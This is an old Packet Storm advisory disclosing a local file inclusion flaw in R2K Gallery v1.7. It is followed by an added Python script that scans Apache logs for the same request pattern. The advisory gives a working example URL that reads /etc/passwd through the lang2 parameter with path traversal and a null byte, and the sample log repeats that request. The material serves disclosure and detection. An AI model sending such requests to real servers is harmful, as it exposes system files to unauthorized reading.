r2k-disclose.txt

2007-05-16T00:00:00
ID PACKETSTORM:56767
Type packetstorm
Reporter Dj7xpl
Modified 2007-05-16T00:00:00

Description

                                        
                                            ` \\\|///  
\\ - - //  
( @ @ )  
----oOOo--(_)-oOOo---------------------------------------------------  
  
[ Y! Underground Group ]  
[ Dj7xpl@yahoo.com ]  
[ Dj7xpl.2600.ir ]  
  
----ooooO-----Ooooo--------------------------------------------------  
( ) ( )  
\ ( ) /  
\_) (_/  
  
---------------------------------------------------------------------  
  
[!] Portal : R2K Gallery v1.7  
[!] Download : http://usuarios.lycos.es/r2kscripts/  
[!] Type : Local File Include Vuln  
  
---------------------------------------------------------------------  
  
Bug :  
  
http://[Target]/[Path]/galeria.php?pictures_folder=[Gallery Folder]&lang2=[Local File]  
  
Example :  
  
http://Target.ir/gallery/galeria.php?pictures_folder=./example/&lang2=../../../etc/passwd%00  
  
---------------------------------------------------------------------  
  
`
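Added example, not part of the original advisory: a log check for the request pattern shown above, flagging galeria.php requests whose lang2 value carries traversal sequences, path separators or a null byte. It assumes Apache combined-format access logs and that legitimate lang2 values are plain identifiers; the sample log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (Apache combined log format); addresses are documentation IPs.
SAMPLE_LOG = """\
192.0.2.10 - - [16/May/2007:10:00:01 +0000] "GET /gallery/galeria.php?pictures_folder=./example/&lang2=english HTTP/1.1" 200 5120 "-" "-"
192.0.2.44 - - [16/May/2007:10:00:07 +0000] "GET /gallery/galeria.php?pictures_folder=./example/&lang2=../../../etc/passwd%00 HTTP/1.1" 200 1873 "-" "-"
192.0.2.10 - - [16/May/2007:10:00:09 +0000] "GET /gallery/galeria.php?pictures_folder=./example/&lang2=es_ES HTTP/1.1" 200 5093 "-" "-"
192.0.2.10 - - [16/May/2007:10:00:12 +0000] "GET /gallery/galeria.php?pictures_folder=./example/ HTTP/1.1" 200 5120 "-" "-"
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
# Assumption: legitimate language names are short plain identifiers.
SAFE_LANG = re.compile(r"[A-Za-z0-9_-]{1,32}")

def lang2_findings(value):
    """Return the reasons a decoded lang2 value does not look like a language name."""
    reasons = []
    if "\x00" in value:
        reasons.append("null-byte")
    if ".." in value:
        reasons.append("dot-dot")
    if "/" in value or "\\" in value:
        reasons.append("path-separator")
    if not reasons and not SAFE_LANG.fullmatch(value):
        reasons.append("not-identifier")
    return reasons

def scan(log_text, script="galeria.php"):
    """Return one record per request to `script` whose lang2 value is suspicious."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("/" + script):
            continue
        # parse_qs percent-decodes once, so %00 becomes a real NUL character here.
        for value in parse_qs(url.query, keep_blank_values=True).get("lang2", []):
            reasons = lang2_findings(value)
            if reasons:
                hits.append({"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                             "lang2": value, "reasons": reasons})
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The status field is kept in each record so that flagged requests answered with 200 can be reviewed first.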